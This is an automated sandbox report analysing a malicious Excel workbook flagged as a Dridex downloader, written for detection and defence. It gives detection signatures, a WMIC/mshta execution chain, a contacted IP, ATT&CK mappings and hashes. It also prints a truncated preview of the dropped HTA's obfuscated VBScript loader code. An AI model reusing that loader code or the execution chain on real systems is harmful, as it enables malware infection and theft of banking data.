
Windows Analysis Report 942830.xlsb

Overview

General Information

Sample Name:942830.xlsb
Analysis ID:528106
MD5:1d439288755abe01c8e0b84351a1adf3
SHA1:3db8730627a0fc4faa83e348e7e25d9ab9b81cb7
SHA256:72c5559bc575d4f5527babe24331374e5d319362e96e1078d35179aceea41941
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Found malicious Excel 4.0 Macro
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Creates a window with clipboard capturing capabilities
IP address seen in connection with other malware

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2580 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 1528 cmdline: wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf" MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 1156 cmdline: mshta C:\ProgramData\EvbrPIaoQqom.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |

    Dropped Files

    Source | Rule | Description | Author | Strings
    C:\ProgramData\EvbrPIaoQqom.rtf | JoeSecurity_DridexDownloader | Yara detected Dridex Downloader | Joe Security |

      Sigma Overview

      System Summary:

      Sigma detected: Microsoft Office Product Spawning Windows Shell
      Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2580, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf", ProcessId: 1528
      Sigma detected: Suspicious WMI Execution
      Source: Process started; Author: Michael Haag, Florian Roth, juju4, oscd.community; Data: Command: wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2580, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf", ProcessId: 1528

      Jbx Signature Overview


      AV Detection:

      Multi AV Scanner detection for submitted file
      Source: 942830.xlsb; Virustotal: Detection: 8%
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Software Vulnerabilities:

      Document exploit detected (process start blacklist hit)
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
      Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 136.144.181.174:8080 (2x)
      Source: Joe Sandbox View; IP Address: 136.144.181.174
      Source: unknown; TCP traffic detected without corresponding DNS query: 136.144.181.174 (6x)
      Source: mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmp; String found in binary or memory: http://investor.msn.com
      Source: mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmp; String found in binary or memory: http://investor.msn.com/
      Source: mshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
      Source: mshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: mshta.exe, 00000005.00000002.674257611.0000000003D70000.00000002.00020000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: WMIC.exe, 00000002.00000002.456772383.0000000001CA0000.00000002.00020000.sdmp; String found in binary or memory: http://servername/isapibackend.dll
      Source: mshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: mshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: mshta.exe, 00000005.00000002.674257611.0000000003D70000.00000002.00020000.sdmp; String found in binary or memory: http://www.%s.comPA
      Source: mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmp; String found in binary or memory: http://www.hotmail.com/oe
      Source: mshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
      Source: mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmp; String found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA1F7DD.png
      Source: C:\Windows\System32\mshta.exe; Window created: window name: CLIPBRDWNDCLASS

      E-Banking Fraud:

      Yara detected Dridex Downloader
      Source: Yara match; File source: C:\ProgramData\EvbrPIaoQqom.rtf, type: DROPPED

      System Summary:

      Found malicious Excel 4.0 Macro
      Source: 942830.xlsb; Macro extractor: Sheet: Macro1 contains: mshta
      Found Excel 4.0 Macro with suspicious formulas
      Source: 942830.xlsb; Initial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheet
      Source: 942830.xlsb; Initial sample: Sheet name: Macro1
      Contains functionality to create processes via WMI
      Source: WMIC.exe, 00000002.00000002.456664618.0000000000380000.00000004.00000020.sdmp; Binary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default<
      Found obfuscated Excel 4.0 Macro
      Source: 942830.xlsb; Macro extractor: Sheet: Macro1 high usage of CHAR() function: 46
      Source: 942830.xlsb; Macro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: 942830.xlsb; Virustotal: Detection: 8%
      Source: C:\Windows\System32\wbem\WMIC.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf" (2x)
      Source: unknown; Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\EvbrPIaoQqom.rtf
      Source: C:\Windows\System32\wbem\WMIC.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\System32\wbem\WMIC.exe; WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
      Source: mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmp; Binary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\~$942830.xlsb
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRDE3D.tmp
      Source: classification engine; Classification label: mal100.troj.expl.evad.winXLSB@4/4@0/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: Window Recorder; Window detected: More than 3 window changes detected
      Source: 942830.xlsb; Initial sample: OLE zip file path = xl/media/image2.png
      Source: 942830.xlsb; Initial sample: OLE zip file path = xl/media/image1.png
      Source: 942830.xlsb; Initial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Persistence and Installation Behavior:

      Creates processes via WMI
      Source: C:\Windows\System32\wbem\WMIC.exe; WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      Creates and opens a fake document (probably a fake document to hide exploiting)
      Source: unknown; Process created: cmd line: evbrpiaoqqom.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: cmd line: evbrpiaoqqom.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX (8x)
      Source: C:\Windows\System32\wbem\WMIC.exe; Process information set: NOOPENFILEERRORBOX (2x)
      Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX (3x)
      Source: C:\Windows\System32\wbem\WMIC.exe TID: 1960; Thread sleep time: -120000s >= -30000s
      Source: C:\Windows\System32\wbem\WMIC.exe TID: 1960; Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\System32\mshta.exe TID: 1664; Thread sleep time: -60000s >= -30000s
      Source: Yara match; File source: app.xml, type: SAMPLE
      Source: mshta.exe, 00000005.00000002.673597194.0000000001210000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
      Source: mshta.exe, 00000005.00000002.673597194.0000000001210000.00000002.00020000.sdmp; Binary or memory string: !Progman
      Source: mshta.exe, 00000005.00000002.673597194.0000000001210000.00000002.00020000.sdmp; Binary or memory string: Program Manager<
      Source: C:\Windows\System32\mshta.exe; Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation (2x)
      Source: C:\Windows\System32\wbem\WMIC.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Windows Management Instrumentation 2 1 | Path Interception | Process Injection 2 | Masquerading 1 | OS Credential Dumping | Virtualization/Sandbox Evasion 1 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Non-Standard Port 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scripting 4 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | Exploitation for Client Execution 3 1 | Logon Script (Windows) | Logon Script (Windows) | Process Injection 2 | Security Account Manager | File and Directory Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting 4 | NTDS | System Information Discovery 1 5 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
      (Digits after a technique name are the signature-count badges shown next to that technique in the matrix.)

      Behavior Graph

      (Behavior graph rendered as an image in the original report; not reproduced here.)

      Screenshots

      (Screenshot thumbnails not reproduced here.)

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      942830.xlsb | 8% | Virustotal |

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      Source | Detection | Scanner | Label
      http://www.%s.comPA | 0% | URL Reputation | safe
      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
      http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | mshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmp | false | | high
      http://www.windows.com/pctv. | mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmp | false | | high
      http://investor.msn.com | mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmp | false | | high
      http://www.msnbc.com/news/ticker.txt | mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmp | false | | high
      http://www.%s.comPA | mshta.exe, 00000005.00000002.674257611.0000000003D70000.00000002.00020000.sdmp | false | URL Reputation: safe | low
      http://www.icra.org/vocabulary/. | mshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | mshta.exe, 00000005.00000002.674257611.0000000003D70000.00000002.00020000.sdmp | false | | high
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | mshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
      http://www.hotmail.com/oe | mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmp | false | | high
      http://servername/isapibackend.dll | WMIC.exe, 00000002.00000002.456772383.0000000001CA0000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
      http://investor.msn.com/ | mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmp | false | | high

                    Contacted IPs


                    Public

                    IP | Domain | Country | ASN | ASN Name | Malicious
                    136.144.181.174 | unknown | Netherlands | 20857 | TRANSIP-AS Amsterdam the Netherlands NL | false

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528106
                    Start date:24.11.2021
                    Start time:19:00:46
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 25s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:942830.xlsb
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winXLSB@4/4@0/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsb
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active AutoShape Object
                    • Active Picture Object
                    • Active Picture Object
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.

                    Simulations

                    Behavior and APIs

                    Time | Type | Description
                    19:01:41 | API Interceptor | 12x Sleep call for process: WMIC.exe modified
                    19:01:42 | API Interceptor | 452x Sleep call for process: mshta.exe modified

                    Joe Sandbox View / Context

                    IPs

                    Match | Associated Sample Name / URL | Detection
                    136.144.181.174 | promo code83874071.xlsb | malicious
                    | promo code83874071.xlsb | malicious
                    | vote number3210109.xlsb | malicious
                    | tax77567960.xlsb | malicious
                    | hunting license-25331.xlsb | malicious
                    | vote number3210109.xlsb | malicious
                    | tax77567960.xlsb | malicious
                    | subscription-84799.xlsb | malicious
                    | hunting license-25331.xlsb | malicious
                    | subscription-84799.xlsb | malicious
                    | 8993268.xlsb | malicious
                    | promo 2352017.xlsb | malicious
                    | 8993268.xlsb | malicious
                    | promo 2352017.xlsb | malicious
                    | Offer 373466695.xlsb | malicious
                    | Offer 373466695.xlsb | malicious
                    | 9049521.xlsb | malicious
                    | 9049521.xlsb | malicious

                                                        Domains

                                                        No context

                                                        ASN

                                                        Match | Associated Sample Name / URL | Detection | Context
                                                        TRANSIP-AS Amsterdam the Netherlands NL | promo code83874071.xlsb | malicious | 136.144.181.174
                                                        | promo code83874071.xlsb | malicious | 136.144.181.174
                                                        | vote number3210109.xlsb | malicious | 136.144.181.174
                                                        | tax77567960.xlsb | malicious | 136.144.181.174
                                                        | hunting license-25331.xlsb | malicious | 136.144.181.174
                                                        | vote number3210109.xlsb | malicious | 136.144.181.174
                                                        | tax77567960.xlsb | malicious | 136.144.181.174
                                                        | subscription-84799.xlsb | malicious | 136.144.181.174
                                                        | hunting license-25331.xlsb | malicious | 136.144.181.174
                                                        | subscription-84799.xlsb | malicious | 136.144.181.174
                                                        | 8993268.xlsb | malicious | 136.144.181.174
                                                        | promo 2352017.xlsb | malicious | 136.144.181.174
                                                        | 8993268.xlsb | malicious | 136.144.181.174
                                                        | promo 2352017.xlsb | malicious | 136.144.181.174
                                                        | Offer 373466695.xlsb | malicious | 136.144.181.174
                                                        | Offer 373466695.xlsb | malicious | 136.144.181.174
                                                        | 9049521.xlsb | malicious | 136.144.181.174
                                                        | 9049521.xlsb | malicious | 136.144.181.174
                                                        | arm6-20211124-0649 | malicious | 37.97.150.92
                                                        | 4VsoRulf3z | malicious | 95.170.75.156

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\ProgramData\EvbrPIaoQqom.rtf
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4990
                                                        Entropy (8bit):5.068599092922693
                                                        Encrypted:false
                                                        SSDEEP:96:bn7txHHP2+qxRlRkdd+/WiZZfPyQZygDwu4yRvddbEBhohP7:lxHvuxRlRkdc/bZMQZy1Qldj
                                                        MD5:265D66A0CA80A3A143F0B500D145BDF2
                                                        SHA1:AE4F5D109A26131099F5514795388E7F43F3612F
                                                        SHA-256:C08069CED61FDB75C931C27940BB43903E50A5B5D2F047B9779AE173E2D47CE9
                                                        SHA-512:D44888266776AB16DF360C23F58F3A37E40696F5565B824344A3D31F878BEB663325349A72A4942D9740BA05F5E876142CFE11C1B57846F546FF82A856401492
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\EvbrPIaoQqom.rtf, Author: Joe Security
                                                        Reputation:low
                                                        Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..j_P_g_k_U_V_K_U_X_O_a_C_U_b = "ru" & Chr(110+1-1) & "dl" & Chr(108+1-1) & Chr(51+1-1) & Chr(50+1-1) & Chr(46+1-1) & "exe" & " C:" & "\\" & "" & "Pr" & "ogr" & "amD" & Chr(97+1-1) & "ta\" & Chr(113+1-1) & "ep" & "nig" & "ger" & ".bi" & "n D" & "llR" & "eg" & "ist" & "" & "erS" & Chr(101+1-1) & "rve" & Chr(114+1-1) & ""..Set s_Q_Q_x_X_t_p_C_p_A = CreateObject("MS" & "XML" & "" & Chr(50+1-1) & Chr(46+1-1) & "Se" & "" & "" & "rve" & Chr(114+1-1) & Chr(88+1-1) & "" & Chr(77+1-1) & "LH" & Chr(84+1-1) & "TP" & ".6" & ".0" & "" & "")....P_E_S_n_C_O_X_P_C_U_k_p_p_X_W = "Wsc" & "rip" & "" & "" & Chr(116+1-1) & Chr(46+1-1) & "" & "" & Chr(83+1-1) & "" & "he" & "" & "ll"..Set v_l_F_J_A_N_r_k_G_B_R_Z_Y_K_f = CreateObject(P_E_S_n_C_O_X_P_C_U_k_p_p_X_W)..
                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6E90A43A.png
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:PNG image data, 238 x 337, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):38157
                                                        Entropy (8bit):7.96137177194393
                                                        Encrypted:false
                                                        SSDEEP:768:7PiEGNOfxgpvUM7w1phhsL+ZfBwnTV+YoS2bUoMokqk++yd6OAd/r:7PFwJpvc1e+BwT8YIbDMz+1d6xt
                                                        MD5:B88B9DF024814E6C791FDAC471ABD26C
                                                        SHA1:6FB92BB20F7A51B40E03467C2EBB217A8E21E21A
                                                        SHA-256:02F3AB917A42A10560A274A9CD91FDA01D7BC428C7428CCAF8CCFF1F46DEA39F
                                                        SHA-512:67E6B7FAE7476847835E5A1F17FBFA60DC35B2AAC299A025102540BBA72D8A3CC120FA69E172FBADE6A4B68F464A98005FC38145CC618A6DC45D8C058F704E9E
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview: .PNG........IHDR.......Q.....s..6...JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA1F7DD.png
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:PNG image data, 279 x 60, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):2191
                                                        Entropy (8bit):7.825535416775479
                                                        Encrypted:false
                                                        SSDEEP:48:ydXGZOauq4oTWmLUDhRHcfr1kqg0BDEqUZCVVQdqc:WapRkR8J3BDEqUAVsqc
                                                        MD5:8EF98D9F0FDB8A20B48077024D27D012
                                                        SHA1:8CE6F554A30C1CEBF90C40B63CA0E9BCF66F09EB
                                                        SHA-256:02A68CA10C3C190B4B9591B5E83AB2E64DF22EEE80B6D37163A01B40AC84C835
                                                        SHA-512:12175DCCD8C65F0755B960A46A282E61A21398C77B623724F75B03FF7E0CAB3FECD4D126173E48FF582567F11C7626A89D61B90149833D7BA4A84949278D5E8D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview: .PNG........IHDR.......<......i....VIDATx...{PT.........Y...4.(.C^".y....4.X....G..&N&M.D.h..N..k:QKe.b.h..K#uy..#J..Ke...e....n.8..eY)G...>..g...s...........B8..........RD./J.!.(E.....RD./J.!.(E.....RD./J.!.(E.....RD./J.!.(E.....RD./J.!.(E..x.=.N..5<.@z.N..P?...>...:].7..,y.P..:#f..5..e!ol....KKZoV..%i......{........&xx...8..q?......\B.l..=ju...)..|.......1.......V..V.K.^?.C........)..=.....z..(OM)..).k....@jTh......&.>.b.._..D....[T.y......<...{t....#.JYT..N...`eg.<...........<<.(..7..n...&/z..Y&...qt.Kx.....6.>.Hd9~.sPp...!k.?x."...D....}_....Oo.V.{......ee....Wl...-b...-.....[k.3Y}..XA.5. 6-&..5_/S...z....~f..I$.....cv....&S4...B...@U]....h|tV.*..:...k.^.3......M.........K.o........}.Y...{3s.Dbq....C...a..2.;....[.c5...`~.dL=..u..4.^....ea3.Uz.%...Bm..^.F....hUm..jUm.m..:Ah....]..i '.s..PU.......GG.V]o...:.X...;.t}}.k^./.k......6.c.4.0.1h...{.(;4D"..U.u.s./{.kk..{.H....6...................].^M........4?H2..du..l.......hV....@Q\...j..
                                                        C:\Users\user\Desktop\~$942830.xlsb
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):165
                                                        Entropy (8bit):1.4377382811115937
                                                        Encrypted:false
                                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                        Static File Info

                                                        General

                                                        File type:Microsoft Excel 2007+
                                                        Entropy (8bit):7.868859973268516
                                                        TrID:
                                                        • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                        • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                        • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                        • ZIP compressed archive (8000/1) 5.73%
                                                        File name:942830.xlsb
                                                        File size:71836
                                                        MD5:1d439288755abe01c8e0b84351a1adf3
                                                        SHA1:3db8730627a0fc4faa83e348e7e25d9ab9b81cb7
                                                        SHA256:72c5559bc575d4f5527babe24331374e5d319362e96e1078d35179aceea41941
                                                        SHA512:aa1f62a6a10d943c94a4be5c1cc367ababdff424c10477c8e9e6219eef8f6c48a03fdfb87220c4d093658a75378987f47b2060cc9efb24f8bd308bdd62947d6b
